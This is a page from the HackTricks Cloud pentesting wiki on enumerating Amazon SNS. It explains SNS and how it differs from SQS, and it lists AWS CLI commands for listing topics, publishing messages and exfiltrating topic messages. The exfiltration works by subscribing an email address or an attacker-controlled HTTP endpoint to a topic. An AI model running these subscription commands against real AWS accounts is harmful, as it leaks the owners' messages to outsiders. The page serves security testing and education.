HackTricks Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - SNS Enum

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

SNS

Amazon Simple Notification Service (Amazon SNS) is described as a fully managed messaging service. It supports both application-to-application (A2A) and application-to-person (A2P) communication types.

Key features for A2A communication include publish/subscribe (pub/sub) mechanisms. These mechanisms introduce topics, crucial for enabling high-throughput, push-based, many-to-many messaging. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a wide range of subscriber systems, facilitating a fanout messaging pattern.

Difference with SQS

SQS is a queue-based service that allows point-to-point communication, ensuring that messages are processed by a single consumer. It offers at-least-once delivery, supports standard and FIFO queues, and allows message retention for retries and delayed processing. On the other hand, SNS is a publish/subscribe-based service, enabling one-to-many communication by broadcasting messages to multiple subscribers simultaneously. It supports various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS, and provides filtering mechanisms for targeted message delivery. While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.

Enumeration

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
    --message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
    --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
    --protocol email \
    --notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
    --protocol http \
    --notification-endpoint http://<attacker>/ \
    --topic-arn <arn>

Note that if the topic is of type FIFO, only subscribers using the protocol SQS can be used (HTTP or HTTPS cannot be used).

Also, even if the --topic-arn contains the region make sure you specify the correct region in --region or you will get an error that looks like indicate that you don't have access but the problem is the region.

Unauthenticated Access

AWS - SNS Unauthenticated Enum

Privilege Escalation

AWS - SNS Privesc

Post Exploitation

AWS - SNS Post Exploitation

Persistence

AWS - SNS Persistence

References

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
PreviousAWS - SES EnumNextAWS - SQS Enum

Last updated